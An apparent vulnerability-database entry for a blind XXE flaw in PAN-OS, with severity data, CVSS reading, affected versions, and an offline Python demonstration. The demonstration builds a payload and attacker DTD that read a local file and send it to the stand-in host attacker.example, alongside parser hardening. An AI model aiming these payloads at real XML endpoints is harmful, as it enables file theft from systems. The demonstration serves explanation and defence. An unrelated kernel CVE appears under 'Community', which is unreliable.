CVE-2024-5919: XML External Entity (XXE) Injection in Palo Alto Networks PAN-OS

Severity: 5.1 MEDIUM (NVD)
EPSS: 0.2% (top 58.50%)
CISA KEV: Not in KEV
Exploit: No known exploits
Timeline: Published Nov 14, 2024

Description

A blind XML External Entities (XXE) injection vulnerability in the Palo Alto Networks PAN-OS software enables an authenticated attacker to exfiltrate arbitrary files from firewalls to an attacker-controlled server. "Blind" means the firewall's response does not echo the file contents back; instead, the parser resolves an external entity that makes the firewall itself send the data out-of-band to the attacker's server. This attack requires network access to the firewall management interface.
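The mechanics behind the description above, as an added example that is not PAN-OS code and does not reproduce any PAN-OS endpoint or request: a DTD in the submitted XML pulls in an attacker-served DTD, which reads a local file into a parameter entity, splices it into a URL, and references that URL so the parser sends the contents out-of-band. It runs offline against Python's expat parser; the host `attacker.example`, the path `/etc/hostname`, its content, and the dict that stands in for network and disk are all constructed. The same function shows the two hardening choices a practitioner would check for: not resolving external parameter entities at all, and refusing any DOCTYPE in untrusted input.

```python
"""Blind (out-of-band) XXE mechanics, reproduced offline with Python's expat.

Added example, not PAN-OS code. Hostnames, paths and file contents are
constructed; a dict stands in for the network and the filesystem.
"""
import xml.parsers.expat as expat

ATTACKER = "http://attacker.example"  # assumed attacker-controlled host

# Constructed request body. The victim's response never carries the file:
# the only visible effect is a parameter-entity reference that makes the
# parser fetch a DTD from the attacker, which is why the bug is "blind".
BLIND_XXE_PAYLOAD = f"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % remote SYSTEM "{ATTACKER}/oob.dtd">
  %remote;
]>
<data>probe</data>
""".encode()

# Constructed DTD the attacker serves: read a local file into a parameter
# entity, splice it into a URL, and reference that URL so the parser sends it.
ATTACKER_DTD = f"""<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM '{ATTACKER}/collect?d=%file;'>">
%wrap;
%send;
""".encode()

# Fake resolver: what each external resource "returns". Unknown URLs (the
# collection endpoint) return nothing; nothing touches disk or network.
RESOLVER = {
    f"{ATTACKER}/oob.dtd": ATTACKER_DTD,
    "file:///etc/hostname": b"fw-mgmt-01",  # constructed file content
}


class DoctypeNotAllowed(ValueError):
    pass


def parse(xml_bytes, *, param_entities, allow_dtd=True):
    """Parse xml_bytes and return the external resources the parser asked for.

    param_entities=True mirrors a parser that resolves external parameter
    entities: the vulnerable configuration. allow_dtd=False refuses any
    DOCTYPE before it is processed, the usual hardening for untrusted XML.
    """
    requests = []
    stack = []  # parser currently running; sub-parsers must inherit its state

    def external_ref(context, base, system_id, public_id):
        # A real resolver would issue the fetch here; each call is one
        # out-of-band request the attacker can observe on their server.
        requests.append(system_id)
        sub = stack[-1].ExternalEntityParserCreate(context)
        stack.append(sub)
        try:
            sub.Parse(RESOLVER.get(system_id, b""), True)
        finally:
            stack.pop()
        return 1

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeNotAllowed(f"DOCTYPE {name!r} in untrusted input")

    p = expat.ParserCreate()
    p.SetParamEntityParsing(
        expat.XML_PARAM_ENTITY_PARSING_ALWAYS if param_entities
        else expat.XML_PARAM_ENTITY_PARSING_NEVER
    )
    p.ExternalEntityRefHandler = external_ref
    if not allow_dtd:
        p.StartDoctypeDeclHandler = reject_doctype
    stack.append(p)
    p.Parse(xml_bytes, True)
    return requests


def rejects_doctype(xml_bytes):
    """True when the DOCTYPE-refusing configuration stops xml_bytes before any fetch."""
    try:
        parse(xml_bytes, param_entities=True, allow_dtd=False)
    except DoctypeNotAllowed:
        return True
    return False


if __name__ == "__main__":
    for url in parse(BLIND_XXE_PAYLOAD, param_entities=True):
        print("vulnerable parser fetched:", url)
    print("hardened parser fetched:", parse(BLIND_XXE_PAYLOAD, param_entities=False))
    print("DOCTYPE rejected:", rejects_doctype(BLIND_XXE_PAYLOAD))
```

With parameter-entity parsing enabled the parser makes three requests in order: the attacker's DTD, the local file, and the collection URL with the file content in its query string; that last request is the exfiltration channel, and the firewall's own HTTP response to the attacker's original request stays clean. With parameter-entity parsing off (expat's default) no request is made, and refusing DOCTYPE outright stops the document before the internal subset is even read. Note the constructed file content is a single token on purpose: expat tokenizes an external parameter entity's text before splicing it into an entity value, so arbitrary file contents do not always survive this route intact, which is one reason blind XXE payloads vary by parser.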

CVSS vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Read as: network-reachable, low attack complexity, no attack requirements, high privileges required, no user interaction; low confidentiality and integrity impact and no availability impact on the vulnerable system, no impact on subsequent systems. The PR:H rating is what keeps the base score at MEDIUM despite arbitrary file read.

Affected Packages (5 packages)

NVD: paloaltonetworks/pan-os 10.1.0 to 10.1.10 (+2 more)
CVEListV5: palo_alto_networks/pan-os 11.0.0 to 11.0.2 (+2 more)
Palo Alto: paloalto/pan-os

Vulnerability Details (2)

CVEList: PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability (2024-11-14)
GHSA: GHSA-m359-59cc-2426: A blind XML External Entities (XXE) injection vulnerability in the Palo Alto Networks PAN-OS software enables an authenticated attacker to exfiltrate (2024-11-14)

Vendor Advisories (1)

Palo Alto: PAN-OS: Authenticated XML External Entities (XXE) Injection Vulnerability

Community (1)

Bugzilla: CVE-2024-36957 kernel: octeontx2-af: avoid off-by-one read from userspace (2024-06-03)